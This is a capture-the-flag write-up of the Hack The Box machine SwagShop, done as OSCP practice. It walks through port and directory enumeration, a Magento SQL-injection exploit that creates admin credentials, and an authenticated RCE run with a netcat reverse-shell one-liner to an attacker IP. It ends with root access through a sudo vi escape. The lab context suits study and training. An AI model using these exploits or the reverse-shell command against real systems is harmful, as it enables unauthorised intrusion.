7 minute read

Introduction


SwagShop is an easy machine. I tried to solve it to get more practice for the OSCP exam. It has a rating of 4.1, which should be enough to showcase that the box must be good.

So let’s jump into the enumeration of the machine.

Enumeration


As always, I use Nmap to perform a port scan and then I enumerate all the interesting ports.

Nmap Scan


Here is the simple scan of all ports:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ sudo nmap -p- -v -sS 10.10.10.140                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 11:30 CEST
Happy 24th Birthday to Nmap, may it live to be 124!
Initiating Ping Scan at 11:30
Scanning 10.10.10.140 [4 ports]
Completed Ping Scan at 11:30, 0.15s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:30
Scanning swagshop.htb (10.10.10.140) [65535 ports]
Discovered open port 80/tcp on 10.10.10.140
Discovered open port 22/tcp on 10.10.10.140
Completed SYN Stealth Scan at 11:41, 696.78s elapsed (65535 total ports)
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.27s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 697.09 seconds
           Raw packets sent: 67197 (2.957MB) | Rcvd: 66632 (2.665MB)

On those two ports, I to a deep scan (with -A flag):

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ sudo nmap -p 22,80 -A 10.10.10.140           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 11:43 CEST
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), 
Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), 
Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   193.87 ms 10.10.16.1
2   114.37 ms swagshop.htb (10.10.10.140)

Nmap done: 1 IP address (1 host up) scanned in 21.44 seconds

I have also done a script scan with the vuln script of NSE:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]  
└─$ sudo nmap -p 22,80 10.10.10.140 --script vuln 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 11:44 CEST   
Nmap scan report for swagshop.htb (10.10.10.140)
Host is up (0.38s latency).
---snip---
http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http servers resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

There were a lot of possible XSS vulnerabilities, but I do not think that they will bring me any further. The script found a CVE, but that is just a DoS, not what I’m looking for.

Web Server Enumeration


SSH does not need to be enumerated, so that leaves me with just the web server running on port 80. The first thing I do is a gobuster scan (do not forget to add the host to the hosts file):

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ gobuster dir -u http://swagshop.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://swagshop.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,log,txt
[+] Timeout:                 10s
===============================================================
2021/09/01 12:02:31 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 16097]
/media                (Status: 301) [Size: 312] [--> http://swagshop.htb/media/]
/includes             (Status: 301) [Size: 315] [--> http://swagshop.htb/includes/]
/lib                  (Status: 301) [Size: 310] [--> http://swagshop.htb/lib/]     
/install.php          (Status: 200) [Size: 44]                                     
/app                  (Status: 301) [Size: 310] [--> http://swagshop.htb/app/]     
/js                   (Status: 301) [Size: 309] [--> http://swagshop.htb/js/]      
/api.php              (Status: 200) [Size: 37]                                     
/shell                (Status: 301) [Size: 312] [--> http://swagshop.htb/shell/]   
/skin                 (Status: 301) [Size: 311] [--> http://swagshop.htb/skin/]    
/cron.php             (Status: 200) [Size: 0]                                      
/LICENSE.html         (Status: 200) [Size: 10679]                                  
/LICENSE.txt          (Status: 200) [Size: 10410]                                  
/var                  (Status: 301) [Size: 310] [--> http://swagshop.htb/var/]     
/errors               (Status: 301) [Size: 313] [--> http://swagshop.htb/errors/]   
/mage                 (Status: 301) [Size: 313] [--> http://swagshop.htb/mage/]  
                                                                                   
===============================================================
2021/09/01 12:34:14 Finished
===============================================================

An interesting path is http://swagshop.htb/lib/Mage/Backup/ (which does not contain any backup, so it’s also a rabbit hole). The other directories are not useful. I open the main page and try to create an account:

Untitled

I can create an account. But that was also not as useful as I thought, because I couldn’t do much after logging in as this user. So I search for an exploit for Magento (the shop site):

Magento-Shoplift-SQLI/poc.py at master · joren485/Magento-Shoplift-SQLI

I found this exploit, which might work. I do not know the exact version of the shop site, but this exploit seems that it should work for all versions.

Exploitation


I download the exploit found above and execute it:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ python poc.py swagshop.htb            
WORKED
Check http://swagshop.htb/admin with creds ypwq:123

It seems to work, so I visit the admin page. Use this URL http://swagshop.htb/index.php/admin:

Untitled

With the credentials generated from the script, I could log in. Now, I can also use the authenticated RCE exploits. At the bottom of the page I see the version: Magento ver. 1.9.0.0

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ searchsploit magento                                                                                                                                            
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection                                                                                                                     | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                          | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                               | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                         | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                        | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                   | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution                                                                                                                     | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                                                                                                                                        | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                        | xml/webapps/37977.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                           | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                      | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass                                                                                                     | php/webapps/48135.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                   
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ searchsploit -m exploits/php/webapps/37811.py
  Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /hackthebox/oscp-prep/swagshop/37811.py

I already downloaded an exploit. Because I had problems with multiple python installations, I changed the script a little. I added parentheses in the print statements and it worked with python3. You also need to change the login credentials in the script:

# Config.
username = 'ypwq'
password = '123'
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # Must be same as /app/etc/local.xml

Now, start a netcat listener and run the script again with this command:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/swagshop]
└─$ python magento_rce.py '[http://10.10.10.140/index.php/admin](http://10.10.10.140/index.php/admin)' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.3 4444 >/tmp/f"

Now, I have a shell.

User Flag


I have permissions to read the user flag:

www-data@swagshop:/home/haris$ cat user.txt
a448**************************c8

Privilege Escalation


First, I upgrade my shell:

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Press Ctrl + z and use this command, which will bring the shell to the foreground so that shortcuts will work.

stty raw -echo; fg

The shell is now upgraded and you can use Ctrl + c without closing it. I use sudo -l to list all commands that can be executed as the root user:

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

I find an exploit on GTFOBins:

[vi GTFOBins](https://gtfobins.github.io/gtfobins/vi/)

I use the command from the sudo -l output and add the -c flag from GTFOBins:

www-data@swagshop:/var/www/html$ sudo vi /var/www/html/a -c ':!/bin/sh'

A shell spawns, in which I have root permissions.

Root Flag


I got root permissions so I can read the root flag:

root@swagshop:/home/haris# cat /root/root.txt
c2b0**************************21

Conclusions


Initial access was a bit tricky but after I got the user shell on the system, I could easily privesc to root. The box was fun to solve and it was a confidence boost for the OSCP exam.

From the learning perspective, it did not teach me a lot.